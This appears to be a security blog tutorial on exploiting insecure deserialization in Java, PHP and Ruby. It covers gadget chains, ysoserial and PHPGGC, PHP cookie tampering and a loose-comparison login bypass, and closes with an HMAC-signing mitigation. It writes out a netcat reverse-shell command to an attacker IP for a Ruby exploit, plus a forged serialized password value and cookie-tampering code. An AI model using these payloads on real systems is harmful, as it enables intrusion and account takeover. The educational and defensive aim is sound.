In a [previous article](https://binaryte.com/blog/identifying-and-understanding-insecure-deserialization-vulnerability), we covered the serialization and deserialization process and how to identify serialized data in several languages. Today, we are going to look at how this vulnerability can be exploited from the attacker’s standpoint.
In web development, serialization is often used for session management, which is essential for many web applications to maintain stateful interactions with users. By serializing user information or using an identifier, the server can identify currently active users by checking their information or IDs.
In a clustered environment, where multiple servers are involved in handling requests, session management becomes more complex. One approach is to use a reverse proxy with load balancing capability, which distributes incoming requests among multiple servers based on various algorithms. In this scenario, serialization can be used to keep session data consistent across all servers in the cluster. By serializing the session information and storing it in a shared database or cache, any server in the cluster can access and update the session data as needed.
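The shared-store idea described above can be sketched in a few lines of Python. This is only an illustration, not how any particular framework does it: `SHARED_STORE`, `save_session` and `load_session` are hypothetical names, and a plain dictionary stands in for the shared database or cache.

```python
import json
import uuid

# Hypothetical stand-in for a cache or database that every server can reach.
SHARED_STORE = {}

def save_session(user_data):
    """Serialize the session data and store it under a random session ID."""
    session_id = uuid.uuid4().hex
    SHARED_STORE[session_id] = json.dumps(user_data)
    return session_id

def load_session(session_id):
    """Any server in the cluster can deserialize the session by its ID."""
    raw = SHARED_STORE.get(session_id)
    return json.loads(raw) if raw is not None else None

# "Server A" creates the session, "server B" reads it back using only the ID.
sid = save_session({"username": "Brad", "isActive": True})
session_seen_by_b = load_session(sid)
```

Note that in this design the client only ever holds the session ID. The problems discussed in the rest of this article appear when the serialized data itself is handed to the client.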
However, if this serialization process is not implemented securely, it can create vulnerabilities that attackers can exploit. The specific ways to exploit these vulnerabilities may vary depending on the programming language used by the target, so it’s important to understand the specifics for each language. Therefore, we will explore the unique aspects of insecure deserialization for each language.
Exploiting Java-based deserialization
To work with Java deserialization, you will need a tool called “ysoserial”. Before going into this, let’s first understand what a gadget chain is and how an attacker can take advantage of it.
The concept of gadget & gadget chain
In cyber security, a gadget is a small piece of code that already exists in an application and performs a specific operation. Several gadgets can be linked together, so that one triggers the next, to create more complex attacks. This is what is referred to as a gadget chain.
For example, an attacker who can trigger code execution through a vulnerability may use a first gadget to gain that initial foothold. Often more than one gadget is involved, each with a different purpose: a second gadget may be used to escalate privileges, and a third to steal particular data from the remote server.
However, a gadget chain is not code that the attacker writes and uploads. Instead, it is built from code that already exists in the website. A common way to do this is to abuse an existing magic method (explained later) that performs a particular action. The attacker can only manipulate the data that the method operates on, not the method itself. Because of this, the attacker usually needs the actual source code to plan the attack (e.g. a magic method that removes a certain object might also be usable to delete other data that the code was never intended to touch).
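To make the idea concrete, here is a harmless Python simulation of a two-gadget chain. Everything in it is an assumption made for illustration: the class names, the `on_restore` hook (which plays the role of a magic method), the toy `naive_deserialize` function and the in-memory `FAKE_FILES` dictionary are all hypothetical, and nothing touches the real filesystem.

```python
# In-memory stand-in for a filesystem, so the example has no real side effects.
FAKE_FILES = {"/tmp/cache/item1": "cached", "/etc/app/config": "secret settings"}

class FileRemover:
    """Existing application code: deletes whatever path it holds."""
    def run(self):
        FAKE_FILES.pop(self.path, None)

class CacheEntry:
    """Existing application code: cleans up after being restored."""
    def on_restore(self):
        # Called automatically by the deserializer, like a magic method.
        self.cleanup.run()

REGISTRY = {"CacheEntry": CacheEntry, "FileRemover": FileRemover}

def naive_deserialize(data):
    """Rebuild objects from untrusted dicts shaped like {"class": ..., "attrs": {...}}."""
    if isinstance(data, dict) and "class" in data:
        cls = REGISTRY[data["class"]]
        obj = cls.__new__(cls)  # skip the constructor, as many deserializers do
        for name, value in data["attrs"].items():
            setattr(obj, name, naive_deserialize(value))
        if hasattr(obj, "on_restore"):
            obj.on_restore()
        return obj
    return data

# The attacker writes no code at all. Only the data is attacker-controlled.
malicious = {
    "class": "CacheEntry",
    "attrs": {"cleanup": {"class": "FileRemover", "attrs": {"path": "/etc/app/config"}}},
}
naive_deserialize(malicious)
```

After the call, `/etc/app/config` is gone from `FAKE_FILES` even though both classes only did what they were written to do. The chain is `CacheEntry.on_restore` calling `FileRemover.run`, and the attacker only chose which objects and which path to feed into it.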
ysoserial
Building a gadget chain by hand is not always necessary, because the website may use libraries for which gadget chains are already known. These known chains make it much easier for an attacker to exploit insecure deserialization vulnerabilities. In Java, a tool called “ysoserial” generates payloads for them. Knowing which libraries the website uses makes things easier, but it isn’t strictly required: the attacker can simply try the chains the tool offers one by one, without having to create gadget chains manually.
First, the attacker selects a gadget chain that suits the target, such as one of the chains for the Apache Commons Collections 4 library. Assuming the target has this library on its classpath, the chain abuses classes that are invoked automatically during deserialization; in ysoserial, the CommonsCollections4 chain is built around a `PriorityQueue` with a `TransformingComparator`. The attacker passes the command to run as an argument, and the tool generates a serialized object that embeds it. When the target deserializes this object, the chain fires and the command is executed on the victim’s system, allowing the specific actions defined by the attacker to be carried out.
Exploiting PHP-based deserialization
In a previous article, we already learned what serialized data looks like in PHP. To summarize, it is a human-readable format in which each data type is encoded as follows.
Data type | Format |
---|---|
String | s:size:"value"; |
Integer | i:value; |
Boolean | b:value; (1 for true, 0 for false) |
Null | N; |
Array | a:size:{key of first element;value of first element;…next key and value} |
Object | O:length of class name:"class name":number of attributes:{key of first attribute;value of first attribute;…next key and value} |
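The format in the table can be reproduced with a short Python sketch. It is only an approximation for illustration: `php_serialize` and `php_serialize_object` are hypothetical helpers, they cover only the types listed above, and objects are limited to public attributes.

```python
def php_serialize(value):
    """Encode a small subset of Python values in PHP's serialize() text format."""
    if value is None:
        return "N;"
    if isinstance(value, bool):  # check bool before int: bool is a subclass of int
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        size = len(value.encode("utf-8"))  # PHP counts bytes, not characters
        return f's:{size}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type: {type(value).__name__}")

def php_serialize_object(class_name, attributes):
    """Encode an object with public attributes only."""
    body = "".join(php_serialize(k) + php_serialize(v) for k, v in attributes.items())
    return f'O:{len(class_name)}:"{class_name}":{len(attributes)}:{{{body}}}'

serialized = php_serialize_object("User", {"username": "Brad", "isActive": True})
# serialized is: O:4:"User":2:{s:8:"username";s:4:"Brad";s:8:"isActive";b:1;}
```

The class name `User` is made up for the example. The important detail is that every string carries its own length, so anyone editing the data by hand has to keep the lengths in sync.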
Manipulating serialization object
PHP serialized data can be exploited by manipulating several of its aspects. The easiest is to manipulate the serialized object itself, which can be as simple as changing the data to something we want. Because the format is readable, we can see what the developer stored in it, such as the username and login status in the session cookie (e.g. `…s:8:"username";s:4:"Brad";s:8:"isActive";b:1;}`).
It probably won’t be that obvious, as the developer may have encoded it first. If the attacker can decode the session cookie and change the username, the server may let the attacker act as another registered user, simply by changing the username value to something like `…s:8:"username";s:4:"John";s:8:"isActive";b:1;}`. Even with such a simple approach, deserializing user-controllable data can lead to severe consequences, and at the same time it exposes an even bigger attack surface for insecure deserialization vulnerabilities.
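The manipulation described above can be sketched as follows. This assumes the cookie is Base64-encoded, which is common but not stated for any particular site; the class name `User` and the helper `tamper_username` are hypothetical. The one non-obvious step is that the length prefix has to be updated when the new name has a different size.

```python
import base64
import re

def tamper_username(cookie_b64, new_name):
    """Decode the cookie, swap the username value, fix its length prefix, re-encode."""
    decoded = base64.b64decode(cookie_b64).decode("utf-8")
    size = len(new_name.encode("utf-8"))  # PHP string sizes are byte counts
    replacement = f's:8:"username";s:{size}:"{new_name}";'
    tampered = re.sub(
        r's:8:"username";s:\d+:"[^"]*";',
        lambda match: replacement,  # a function avoids backslash handling in the replacement
        decoded,
        count=1,
    )
    return base64.b64encode(tampered.encode("utf-8")).decode("ascii")

# What the server is assumed to have issued.
original = 'O:4:"User":2:{s:8:"username";s:4:"Brad";s:8:"isActive";b:1;}'
cookie = base64.b64encode(original.encode("utf-8")).decode("ascii")

# What the attacker sends back.
forged = tamper_username(cookie, "Jonathan")
forged_plain = base64.b64decode(forged).decode("utf-8")
```

If the server deserializes `forged` without any integrity check, it has no way to tell that the username was changed on the client side.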
Unexpected loose comparison result
Every programming language has its own flaws and PHP is no exception. In PHP, two values of different data types can be compared with loose comparison (==) or strict comparison (===). Taking advantage of how the loose comparison operator behaves is another way to exploit this kind of vulnerability. When a number is loosely compared with a string, PHP converts the string to a number first. For example, the following comparison of two different data types evaluates to true.
var_dump(5 == "5");
bool(true)
Weirdly, in PHP versions before 8.0, the comparison still returns true if you append other characters to the string. PHP evaluates `5 == "5 some value"` as true, treating it the same way as `5 == "5"`. In other words, everything after the leading number is completely ignored. Even weirder, `0 == "any string"` is considered true: because “any string” does not start with a number, it is converted to the integer 0, and true is returned as a result.
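Since Python does not behave this way, the comparisons described above can be emulated to see the rule at work. The two functions below are a simplified approximation that handles integers only (no floats or exponents); `loose_eq_php7` and `loose_eq_php8` are hypothetical names, not PHP APIs.

```python
import re

_LEADING_INT = re.compile(r"^\s*[+-]?\d+")
_WHOLE_INT = re.compile(r"^\s*[+-]?\d+\s*$")

def loose_eq_php7(number, text):
    """Approximate `int == string` before PHP 8.0: the string is cast to an integer."""
    match = _LEADING_INT.match(text)
    as_int = int(match.group()) if match else 0  # no leading number means 0
    return number == as_int

def loose_eq_php8(number, text):
    """Approximate `int == string` from PHP 8.0 on: only numeric strings compare as numbers."""
    if _WHOLE_INT.match(text):
        return number == int(text)
    return str(number) == text  # otherwise the number is compared as a string

old_results = [
    loose_eq_php7(5, "5"),
    loose_eq_php7(5, "5 some value"),
    loose_eq_php7(0, "any string"),
]
new_results = [
    loose_eq_php8(5, "5"),
    loose_eq_php8(5, "5 some value"),
    loose_eq_php8(0, "any string"),
]
```

Under the old rule all three comparisons are true, while under the newer rule only the first one is.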
Now, consider this. The developers may put an access token or, even worse, the user’s password in the serialized object. The decoded serialized object in the cookie looks like this: `…s:8:"username";s:4:"Brad";s:8:"password";s:14:"secretpassword";}`. The website uses loose comparison to compare the unserialized value from the cookie with the password in the database to let users log in.
if (unserialize($_COOKIE["password"]) == $password) {
    // User logged in successfully
}
Knowing how PHP interprets this, the attacker may deliberately change the serialized object to something like `…s:8:"username";s:4:"Brad";s:8:"password";i:0;}`. Following the same logic we have discussed earlier, the comparison now returns true for any stored password that does not start with a digit, allowing the attacker to bypass the authentication.
However, this is only possible because deserialization preserves the data type, so the attacker can submit an integer instead of a string. It won’t work if the application reads the password value directly from the request, because that value is always a string and the comparison would return false. At the time of writing (PHP 8.1), this behavior has already been fixed because it can lead to security exploits: since PHP 8.0, a number is no longer equal to a non-numeric string. Despite this, many websites still run an outdated version of PHP with the old behavior and are therefore prone to this kind of exploit.
Magic methods
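In many languages, the term “magic methods” refers to special methods whose names start with a double underscore (`__`) and that the language invokes automatically on certain events. They are widely used in Object-Oriented Programming. One example is Python’s `__init__()` method, which is analogous to `__construct()` in PHP. These methods are automatically triggered whenever a new object is created. PHP has similar hooks for deserialization, such as `__wakeup()`, which `unserialize()` calls on the restored object.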
The vulnerability does not lie within the magic method itself. Rather, the risk arises when the attacker is able to control the data that invokes or executes this magic method. In such a scenario, the source of the threat could be the deserialized object itself.
In some cases, the attacker may gain access to the actual source code, for example through an exposed directory listing. By studying the code, he/she might be able to identify the available classes. Some of these classes may contain a deserialization magic method that performs a dangerous operation. Using what the source code reveals, the attacker can replace the original serialized object with one whose class and attribute values are taken from the source code, and let the deserialization process do the job on the attacker’s behalf.
PHPGGC (PHP Generic Gadget Chain)
PHPGGC is the PHP equivalent of the ysoserial tool for Java. In other words, it is a POC (Proof of Concept) tool for exploiting deserialization in PHP. Put simply, it uses gadget chains from known libraries and frameworks to run arbitrary code. You can find more detailed information in its GitHub repository.
Besides this, it is sometimes possible to exploit deserialization vulnerabilities without the application ever calling `unserialize()`. This can be done with a PHP archive (PHAR) file, which requires the attacker to upload the file to the target server. It is a more advanced technique and we won’t go further into it for now.
Exploiting Ruby-based deserialization
Unlike Java and PHP, Ruby has no dedicated tool for exploiting known gadget chains, at least at the time of writing. However, you can still find published exploit code that achieves the same goal. Since you will be working with that code directly, a basic understanding of Ruby is required.
While looking for a Ruby deserialization exploit, I found a very interesting one, which you can find here, that works on Ruby version 2.6.3 or lower.
This exploit takes advantage of the ERB class, Ruby’s default templating system. `ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new` is a constructor call that creates a new instance of the DeprecatedInstanceVariableProxy class, which is defined in the ActiveSupport::Deprecation module of the Ruby on Rails framework. This class wraps another object, such as the ERB object in the exploit code, and provides a way to access its instance variables.
In the exploit code, the very first line is `code = 'touch /tmp/rce'`. Much like with ysoserial, you can change it to your own payload. For example, you can change it to something like this:
code = 'nc -nv 172.19.0.10 44 -e /bin/bash'
This command opens a reverse shell, where the IP address above points to the attacker’s machine. For it to work, you also need to listen on the corresponding port, which has been explained in more detail here. The payload is then “marshalled” by the exploit code, and the generated output should be placed in the URL path mentioned in the exploit code.
Conclusion
Note that insecure deserialization can lead to RCE, or even allow the attacker to open a reverse shell connection into the victim’s system. In a deserialization attack, the attacker crafts a payload that bypasses the input validation checks and abuses the deserialization process to execute arbitrary code. Since deserialization is a fundamental part of many modern web applications, it is important to be aware of the risks associated with this process and implement proper mitigation techniques to prevent deserialization vulnerabilities.
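As one example of such a mitigation, the server can attach a keyed signature to any serialized data it hands to the client and refuse to deserialize anything whose signature does not match. The sketch below is a minimal illustration using Python’s standard `hmac` module; `SECRET_KEY`, `sign` and `verify` are hypothetical names, and a real application would also need key management and expiry, which are left out here.

```python
import hashlib
import hmac

# Hypothetical key; in practice it is random, kept server-side and never sent to clients.
SECRET_KEY = b"replace-with-a-random-server-side-key"

def sign(serialized):
    """Append an HMAC-SHA256 tag so that later tampering can be detected."""
    tag = hmac.new(SECRET_KEY, serialized.encode("utf-8"), hashlib.sha256).hexdigest()
    return f"{serialized}.{tag}"

def verify(cookie):
    """Return the serialized data if the tag matches, otherwise None."""
    serialized, _, tag = cookie.rpartition(".")
    expected = hmac.new(SECRET_KEY, serialized.encode("utf-8"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag.encode("utf-8"), expected.encode("utf-8")):
        return None
    return serialized

data = 'O:4:"User":2:{s:8:"username";s:4:"Brad";s:8:"isActive";b:1;}'
signed_cookie = sign(data)
tampered_cookie = signed_cookie.replace("Brad", "John")
```

Here `verify(signed_cookie)` returns the original data, while `verify(tampered_cookie)` returns `None`, so the modified object never reaches the deserializer. Signing does not make deserialization itself safe; it only ensures that the data being deserialized is data the server produced.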